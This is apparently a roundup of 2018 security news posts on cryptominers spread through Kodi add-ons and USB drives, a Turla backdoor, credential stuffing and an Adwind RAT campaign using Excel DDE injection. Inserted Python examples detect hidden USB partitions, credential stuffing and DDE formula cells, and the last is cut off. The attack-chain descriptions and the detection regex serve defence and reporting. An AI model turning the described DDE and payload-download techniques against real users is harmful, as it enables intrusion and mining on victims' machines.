  3. They install a ready-made Kodi build that contains a malicious add-on but no link to a repository for updates. They are initially compromised, though receive no further updates to the malicious add-on. However, if the cryptominer is installed, it will persist and receive updates.

The malicious code distributed in this campaign is able to compromise both Windows and Linux platforms. It is a multi-stage malware that implements measures to make it hard for analysts to trace the malicious code back to the add-on.

Attackers added the malicious add-on to the XvMBC, Bubbles, and Gaia repositories.

Most of the infections were observed in the United States, Israel, Greece, the United Kingdom, and the Netherlands.

Kodi

“After victims add the malicious repository to their Kodi installation, the malicious repository serves an add-on named script.module.simplejson – a name matching that of a legitimate add-on used by many other add-ons. However, while other repositories only have the script.module.simplejson add-on at version 3.4.0, the malicious repository serves this add-on with version number 3.4.1.” continues the report.

“Since Kodi relies on version numbers for update detection, all users with the Auto Update feature enabled (which is a common default setting) will automatically receive script.module.simplejson version 3.4.1 from the malicious repository.”

Although the main repositories used in this campaign are now either closed or cleaned, many devices are still running the malicious add-ons to mine Monero.

Researchers from ESET revealed that the crooks behind the campaign have already mined about $6,700 worth of Monero.

“According to these statistics of the malware authors’ Monero wallet, provided by Nanopool, a minimum of 4774 victims are affected by the malware at the time of writing, and have generated 62,57 XMR (about 5700 EUR or 6700 USD) as of this writing.” concludes the report.

Further details, including the IoCs, are available in the report.

Pierluigi Paganini

(Security Affairs – Kodi, malware)

The post Crooks leverages Kodi Media Player add-ons for malware distribution appeared first on Security Affairs.

Cryptocurrency mining malware increases 86%

McAfee released its McAfee Labs Threats Report September 2018, examining the growth and trends of new cyber threats in Q2 2018. In the second quarter, they saw the surge in cryptomining malware growth that began in Q4 2017 continue through the first half of 2018. McAfee also saw the continued adaptation of the type of malware vulnerability exploits used in the WannaCry and NotPetya outbreaks of 2017. Although less common than ransomware, cryptomining malware has … More

The post Cryptocurrency mining malware increases 86% appeared first on Help Net Security.

The State of Security: Malware in the Cloud: What You Need to Know

Cloud security is not as simple as it may seem. Businesses have a shared security responsibility with cloud service providers, but some lack the knowledge to keep up their share of the bargain. Poor configuration and data leaks are common problems that many businesses encounter in the cloud. These issues can lead to malware infecting […]… Read More

The post Malware in the Cloud: What You Need to Know appeared first on The State of Security.


Victims of Turla Backdoor More Numerous Than Originally Thought

Researchers determined that the victims of a backdoor developed by the advanced persistent threat (APT) group Turla are more numerous than originally expected.

The threat group recently employed the backdoor to access the foreign offices of two European countries and a major defense contractor, according to Slovakian IT security company ESET. Those victims received less publicity than Germany’s Federal Foreign Office, which the group breached after compromising the network of the country’s Federal College of Public Administration.

The most recent versions of Turla’s invention went after targets’ inboxes by subverting Microsoft Office’s Messaging Application Programming Interface (MAPI). They were fully controllable by email and didn’t rely on a conventional command-and-control (C&C) server. Instead, the backdoors used specially crafted PDF files in email attachments to fulfill a series of commands such as data exfiltration. The most recent variant from April 2018 was also capable of executing PowerShell commands by leveraging Empire PSInject.

Turla’s Threat Innovation Continues

In 2017, ESET observed Turla leveraging another backdoor called Gazer to target embassies and government organizations around the world. A year later, researchers found evidence that the threat group was bundling the backdoors with a legitimate Adobe Flash Player installer and using URLs and IP addresses that appeared identical to Adobe’s actual infrastructure.

Given ESET’s most recent findings, Turla is showing no signs of slowing down its efforts to spy on promising targets and secretly infect networks with malware for as long as possible.

How to Block an Email-Borne Backdoor

To defend against this and other backdoor threats, security teams should monitor for the indicators of compromise (IoCs) listed in the IBM X-Force Exchange threat advisory. Security experts also recommend following the National Institute of Standards and Technology’s (NIST) cybersecurity framework and conducting security awareness training to educate employees about email-based threats.

Sources: ESET, ESET(1), ESET(2)

The post Victims of Turla Backdoor More Numerous Than Originally Thought appeared first on Security Intelligence.

USB threats from malware to miners

Introduction

In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

Methodology and key findings

The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

Key findings

  • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
  • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported on August 21, 2018, has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.

The evolving cyberthreat landscape for USBs

Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.

These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.

Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN

Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN

USBs as a tool for advanced threat actors

USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.
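The tail-of-disk reservation described above leaves a footprint a defender can look for: a gap between the end of the last partition and the end of the disk. The following is an added example, not code from the Securelist report or any Kaspersky product; it assumes a classic MBR partition table (GPT and extended partitions are not handled), a constructed sample MBR, and an arbitrary 100 MiB alert threshold.

```python
"""Flag unallocated space at the end of a removable disk (MBR layout).

Added example (not from the Securelist report): a forensic sanity check for
the "hidden space reserved at the end of the disk" technique. It parses a
classic MBR partition table and reports the gap between the last allocated
sector and the end of the disk. The sample MBR is constructed inline.
"""
import struct

SECTOR = 512
MBR_SIG_OFFSET = 510
PART_TABLE_OFFSET = 446
PART_ENTRY_SIZE = 16


def parse_mbr_partitions(mbr: bytes):
    """Return a list of (type, lba_start, sector_count) for non-empty entries."""
    if len(mbr) < SECTOR or mbr[MBR_SIG_OFFSET:MBR_SIG_OFFSET + 2] != b"\x55\xAA":
        raise ValueError("not an MBR: bad boot signature")
    parts = []
    for i in range(4):
        off = PART_TABLE_OFFSET + i * PART_ENTRY_SIZE
        entry = mbr[off:off + PART_ENTRY_SIZE]
        ptype = entry[4]                                   # partition type byte
        lba_start, count = struct.unpack_from("<II", entry, 8)  # little-endian
        if ptype == 0 or count == 0:
            continue  # empty slot
        parts.append((ptype, lba_start, count))
    return parts


def unallocated_tail(mbr: bytes, total_sectors: int):
    """Sectors between the end of the last partition and the end of the disk."""
    parts = parse_mbr_partitions(mbr)
    if not parts:
        return total_sectors
    last_end = max(start + count for _, start, count in parts)  # exclusive
    if last_end > total_sectors:
        raise ValueError("partition extends past end of disk")
    return total_sectors - last_end


def suspicious_tail(mbr: bytes, total_sectors: int, threshold_mib: int = 100):
    """True when the unallocated tail exceeds threshold_mib. Slack after the
    last partition is normally a few MiB at most on a factory-formatted stick;
    the threshold is an assumption, tune it to your fleet."""
    tail_bytes = unallocated_tail(mbr, total_sectors) * SECTOR
    return tail_bytes >= threshold_mib * 1024 * 1024


def build_mbr(partitions):
    """Constructed test helper: build a 512-byte MBR from (type, start, count)."""
    mbr = bytearray(SECTOR)
    for i, (ptype, start, count) in enumerate(partitions):
        off = PART_TABLE_OFFSET + i * PART_ENTRY_SIZE
        mbr[off + 4] = ptype
        struct.pack_into("<II", mbr, off + 8, start, count)
    mbr[MBR_SIG_OFFSET:MBR_SIG_OFFSET + 2] = b"\x55\xAA"
    return bytes(mbr)


# Constructed sample: an 8 GiB stick (16,777,216 sectors) whose single FAT32
# partition (type 0x0C) has been shrunk so that 512 MiB stays unallocated.
DISK_SECTORS = 8 * 1024 * 1024 * 1024 // SECTOR
HIDDEN_SECTORS = 512 * 1024 * 1024 // SECTOR
SHRUNK_MBR = build_mbr([(0x0C, 2048, DISK_SECTORS - 2048 - HIDDEN_SECTORS)])
# Same stick with the partition filling the disk (normal factory layout).
NORMAL_MBR = build_mbr([(0x0C, 2048, DISK_SECTORS - 2048)])

if __name__ == "__main__":
    for name, mbr in (("shrunk", SHRUNK_MBR), ("normal", NORMAL_MBR)):
        tail = unallocated_tail(mbr, DISK_SECTORS)
        print(f"{name}: {tail * SECTOR // (1024 * 1024)} MiB unallocated, "
              f"suspicious={suspicious_tail(mbr, DISK_SECTORS)}")
```

On a real device, read the first 512 bytes of the block device into `mbr` and take `total_sectors` from the device size; a large tail is a reason to image the whole disk, not just the partition.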

The Stuxnet survivor CVE-2010-2568

Microsoft fixed the last of the vulnerable LNK code paths in March 2015. Even so, in 2016 as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability (it was overtaken in 2017 by the EternalBlue exploit). CVE-2010-2568 also continues to feature in malware distributed by USB devices and other removable media: despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.

Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN

Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN

If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

Malware delivered via removable media

The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

Miners – rare but persistent

USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

Year                        | Detection data for Trojan.Win32.Miner.ays | Unique user count
----------------------------|-------------------------------------------|------------------
2017                        | 778,620                                   | 236,000
2018 (estimate based on H1) | 600,698                                   | 196,866

Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also be seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

These results suggest that propagation via removable media works well for this threat.

Detection data for Trojan.Win64.Miner.all is as follows:

Year                        | Detection data for Trojan.Win64.Miner.all | Unique user count | YoY change | Unique user count as share of all users hit with a removable media threat
----------------------------|-------------------------------------------|-------------------|------------|--------------------------------------------------------------------------
2016                        | 4,211,246                                 | 245,702           | +70.15%    | 4.2%
2017                        | 4,214,785                                 | 301,178           | +18.42%    | 6.7%
2018 (estimate based on H1) | 4,209,958                                 | 362,242           | +16.42%    | 9.2%

Dark Tequila – advanced banking malware

In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

Target geography

Emerging markets appear to be the most vulnerable to infection by removable media.

The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.

Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)

The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be influenced by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.

Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)

Conclusion and advice

The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

Advice for all USB users:

  • Be careful about the devices you connect to your computer – do you know where they came from?
  • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
  • Make sure all data stored on the USB is also encrypted
  • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

Additional advice for businesses:

  • Manage the use of USB devices: define which USB devices can be used, by whom and for what
  • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
  • Don’t leave USBs lying around or on display

Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.

Securelist - Kaspersky Lab’s cyberthreat research and reports

Stealthy cryptomining apps still on Google Play

Researchers have flagged 25 apps on Google Play that are surreptitiously mining cryptocurrency for their developers, and some of these have still not been removed, they warn. About the malicious apps: disguised as games, utilities and educational offerings, these malicious apps have been downloaded and installed more than 120,000 times. “Most of the apps were found to have embedded code from Coinhive, a JavaScript implementation to mine Monero,” the researchers explained. “The miner code, which …

The post Stealthy cryptomining apps still on Google Play appeared first on Help Net Security.

Security Affairs: Akamai Report: Credential stuffing attacks are a growing threat

According to Akamai’s latest State of the Internet report on credential stuffing, credential stuffing continues to be a growing threat.

According to the Akamai report titled “[state of the internet] / security CREDENTIAL STUFFING ATTACKS”, credential stuffing attacks are a growing and often underestimated threat.

Credential stuffing attacks use botnets to try stolen login credentials, usually obtained through phishing attacks and data breaches, against many sites. This kind of attack is very effective because of the bad habit users have of reusing the same password across multiple services.

The experts detected 8.3 billion malicious login attempts from bots in May and June; overall, 30 billion malicious logins were observed between November 2017 and June 2018, an average of 3.75 billion per month.

“These botnets attempt to log into a target site in order to assume an identity, gather information, or steal money and goods,” states the report published by Akamai.

“They use lists of usernames and passwords gathered from the breaches you hear about nearly every day on the news. They’re also one of the main reasons you should be using a password manager to create unique and random strings for your passwords.”

According to the experts, the botnets involved in attacks across multiple domains try to hide their activity by spreading a low volume of attempts over a long period, a method referred to as “low and slow.” This technique lets attackers bury malicious logins within normal traffic volumes.

The financial and retail sectors are the most targeted by attackers using this technique, simply because compromised customer accounts are easy to monetize.

The report describes a large credential-stuffing attack on a US credit union, in which malicious login traffic spiked from a daily average of 800 attempts per hour to 8,723 attempts per hour. Over the week, the credit union observed 315,000 malicious login attempts from nearly 20,000 different IP addresses; 4,382 distinct HTTP User Agents were seen, coming from fewer than 2,000 autonomous system numbers.


In another attack, a large financial services institution received over 350,000 login attempts in just one afternoon.

Most of the credential stuffing attacks originated in the US (2.82 billion attempts), followed by Russia (1.55 billion attempts). Most of the targets are located in the US because data on American citizens is exposed in a large number of data breaches.

“One of the main reasons many organizations don’t have stronger controls to prevent credential stuffing is that 70% of the people surveyed believe the tools needed to defend against these attacks diminish the web experience of legitimate users,” concludes the report published by the experts.

“Clearly, credential stuffing defenses need to be able to function without introducing user lag to be successful.”
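The indicators the report describes (one source trying many different usernames, a “low and slow” campaign spread across many quiet IPs that share one tool, and hourly failure volume far above the site’s baseline) can all be computed from ordinary authentication logs. The Python below is an added example, not code from Akamai or Security Affairs; the log format (`ts ip username user_agent result`), the field names, the thresholds and the log lines themselves are assumptions constructed for illustration.

```python
"""Credential stuffing indicators computed from authentication logs.

Added example, not code from Akamai or Security Affairs. The log format
("ts ip username user_agent result"), the field names and every threshold
below are assumptions chosen for illustration; the log lines are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Attempt:
    ts: str      # ISO-8601 timestamp, e.g. 2018-06-01T10:00:01Z
    ip: str
    user: str
    ua: str      # user agent; the constructed format keeps it space-free
    ok: bool


# Constructed sample: three quiet IPs sharing one tool, each trying a few
# usernames, plus two ordinary users (one mistyped password, one success).
SAMPLE_LOG = """\
2018-06-01T10:00:01Z 203.0.113.10 alice.w python-requests/2.18 FAIL
2018-06-01T10:00:07Z 203.0.113.10 bob.k python-requests/2.18 FAIL
2018-06-01T10:00:12Z 203.0.113.10 carol.m python-requests/2.18 FAIL
2018-06-01T10:00:19Z 203.0.113.10 dave.p python-requests/2.18 SUCCESS
2018-06-01T10:01:03Z 198.51.100.7 erin.s python-requests/2.18 FAIL
2018-06-01T10:01:21Z 198.51.100.7 frank.t python-requests/2.18 FAIL
2018-06-01T10:01:44Z 198.51.100.7 grace.h python-requests/2.18 FAIL
2018-06-01T10:02:05Z 192.0.2.33 heidi.j python-requests/2.18 FAIL
2018-06-01T10:02:30Z 192.0.2.33 ivan.l python-requests/2.18 FAIL
2018-06-01T10:02:58Z 192.0.2.33 judy.n python-requests/2.18 FAIL
2018-06-01T10:03:10Z 192.0.2.33 alice.w python-requests/2.18 FAIL
2018-06-01T10:05:00Z 203.0.113.200 mallory.z Mozilla/5.0 FAIL
2018-06-01T10:05:20Z 203.0.113.200 mallory.z Mozilla/5.0 SUCCESS
2018-06-01T11:10:00Z 203.0.113.201 trent.q Mozilla/5.0 SUCCESS
"""


def parse_log(text):
    """Parse the constructed 'ts ip user ua result' lines into Attempt records."""
    attempts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, ua, result = line.split()
        attempts.append(Attempt(ts, ip, user, ua, result == "SUCCESS"))
    return attempts


def _ratio(fails, total):
    return fails / total if total else 0.0


def flag_ips(attempts, min_users=3, min_fail_ratio=0.7):
    """Per-source view: one IP trying many usernames and mostly failing.

    Returns {ip: (distinct_usernames, failure_ratio)} for flagged sources."""
    users, fails, total = defaultdict(set), defaultdict(int), defaultdict(int)
    for a in attempts:
        users[a.ip].add(a.user)
        total[a.ip] += 1
        fails[a.ip] += int(not a.ok)
    flagged = {}
    for ip in total:
        ratio = _ratio(fails[ip], total[ip])
        if len(users[ip]) >= min_users and ratio >= min_fail_ratio:
            flagged[ip] = (len(users[ip]), ratio)
    return flagged


def flag_clusters(attempts, min_users=8, min_fail_ratio=0.8):
    """Campaign view for 'low and slow' traffic: group by user agent so that
    many quiet IPs sharing one tool surface as a single noisy cluster.

    Returns {ua: {"ips": n, "distinct_users": n, "failure_ratio": r}}."""
    by_ua = defaultdict(list)
    for a in attempts:
        by_ua[a.ua].append(a)
    flagged = {}
    for ua, group in by_ua.items():
        distinct_users = {a.user for a in group}
        ratio = _ratio(sum(not a.ok for a in group), len(group))
        if len(distinct_users) >= min_users and ratio >= min_fail_ratio:
            flagged[ua] = {
                "ips": len({a.ip for a in group}),
                "distinct_users": len(distinct_users),
                "failure_ratio": ratio,
            }
    return flagged


def hourly_spikes(attempts, baseline_per_hour, factor=3.0):
    """Volume view: hours whose failed-login count is >= factor x baseline.

    Returns {"YYYY-MM-DDTHH": failures} for the hours that spike."""
    per_hour = defaultdict(int)
    for a in attempts:
        if not a.ok:
            per_hour[a.ts[:13]] += 1
    return {h: n for h, n in per_hour.items() if n >= factor * baseline_per_hour}


if __name__ == "__main__":
    records = parse_log(SAMPLE_LOG)
    print("per-IP:", flag_ips(records))
    print("per-UA cluster:", flag_clusters(records))
    print("hourly spikes:", hourly_spikes(records, baseline_per_hour=2.0))
```

The per-IP view is what a simple rate limit sees; in the constructed log each bot IP makes only three or four requests, so the cluster view, which aggregates by user agent across sources, is the one that surfaces the campaign as a whole without adding latency to any individual login. The thresholds are placeholders and have to be tuned against a site’s own baseline, which is exactly the figure the report cites for the credit union (800 attempts per hour).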

Pierluigi Paganini

(Security Affairs – credential stuffing, hacking)

The post Akamai Report: Credential stuffing attacks are a growing threat appeared first on Security Affairs.

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What spiked the movement, starting in fall 2017, toward cryptojacking? The first reason is the value of cryptocurrency. If an attacker can steal bitcoins, for example, from a victim’s system, that’s enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems? There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords wipe away this view. If an attacker can hijack enough systems, mining in high volume can be profitable. Not only individuals struggle with protecting against these attacks; companies suffer from them as well.

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to create the right amount of security controls. We have seen breaches in which bad actors uploaded their own containers and added them to a company’s cloud environment—which started to mine cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems.

Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems.

Adwind is a remote access Trojan (RAT). The samples used in the recently discovered campaign are Adwind 3.0 RAT and are delivered through a Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel.

The campaign was uncovered at the end of August. The attackers mainly targeted users in Turkey (75%); the experts noticed that other victims were located in Germany but were likely members of the Turkish community.

The spam campaign uncovered by the experts leveraged malicious documents written in Turkish.

“This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.” reads the analysis published by Cisco Talos.

The experts observed at least two different droppers in this campaign, using either .csv or .xlt files, both of which are opened by Microsoft Excel by default.

Both of them leverage a new variant of the DDE code injection attack; although the technique is well known, the variant used in this campaign is still undetected.

The dropper file can have more than 30 different file extensions. Some of them are not opened by Excel by default; however, the attackers can use a script that launches Excel with a file bearing one of these extensions as a parameter.

“Formats like CSV don’t have a predefined header, thus they can contain any kind of data at the beginning. Having random data like in the samples we found may trick the anti-virus into skipping the file scanning. Other formats may be considered corrupted, as they might not follow the expected format,” continues the report.


Excel displays different warnings to the user regarding the execution of code: the first relates to opening a corrupted file, the second notifies the user that the document will execute the application “CMD.exe.”

If the user accepts all the warnings, the application is executed on the system.

Talos pointed out that the attackers aim to inject code that creates and executes a Visual Basic Script. That script uses the Microsoft bitsadmin tool, which can download or upload jobs and monitor their progress, to retrieve the final payload in the form of a Java archive.

The Java code is packed with the demo version of the “Allatori Obfuscator” commercial packer, version 4.7.

The final payload is a sample of the Adwind RAT v3.0.

“The DDE variant used by the droppers in this campaign is a good example of how signature-based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations,” Talos concludes.

“This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio.”
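Talos’ two warnings, that the variant evades signature matching and that scanners keyed on file extension miss it, point at a content-based check: look inside any file Excel might open, ignore its name, and flag cells that have the DDE `application|topic!item` shape even when junk bytes precede the real content. The Python below is an added example, not code from Cisco Talos, ReversingLabs or Security Affairs; it covers text formats such as CSV, the delimiter and the formula-trigger list are assumptions, and the two sample files are constructed (the DDE cell uses a harmless `echo`).

```python
"""Content-based scan for DDE-style formula cells in text spreadsheet files.

Added example, not code from Cisco Talos, ReversingLabs or Security Affairs.
It assumes the defender scans by content rather than by extension, because
the droppers described above hide behind extensions Excel will open and can
prefix the file with arbitrary bytes. It covers text formats such as CSV;
the sample files are constructed and the delimiter is an assumption.
"""
import csv
import io
import re

# A cell that starts with a formula trigger (=, +, -, @) and then uses the
# DDE "application|topic!item" shape.  The trigger list follows OWASP's
# CSV-injection guidance (assumption for this example).
DDE_CELL = re.compile(r"^[=+\-@]\s*[A-Za-z0-9_.]+\s*\|.*!", re.DOTALL)


def scan_text(text, delimiter=","):
    """Return [(line_number, cell)] for every cell that looks like a DDE call."""
    findings = []
    # NUL bytes from a binary prefix would abort csv parsing; blank them out.
    reader = csv.reader(io.StringIO(text.replace("\x00", " ")), delimiter=delimiter)
    for row in reader:
        for cell in row:
            cell = cell.strip()
            if DDE_CELL.match(cell):
                findings.append((reader.line_num, cell))
    return findings


def scan_bytes(data):
    """Scan raw file bytes.  The file name and extension are deliberately not
    consulted, so a renamed or junk-prefixed file is still inspected."""
    return scan_text(data.decode("utf-8", errors="replace"))


def scan_file(path):
    """Convenience wrapper for a file on disk; still extension-agnostic."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


# Constructed samples.  The second one mimics the droppers' trick of putting
# random bytes before the payload; the DDE cell only runs a harmless echo.
BENIGN_CSV = b"name,balance\nalice,10\nbob,-5\n"
JUNK_PREFIX_CSV = (b"\x89\xff\xfe random junk header\n"
                   b"id,note\n"
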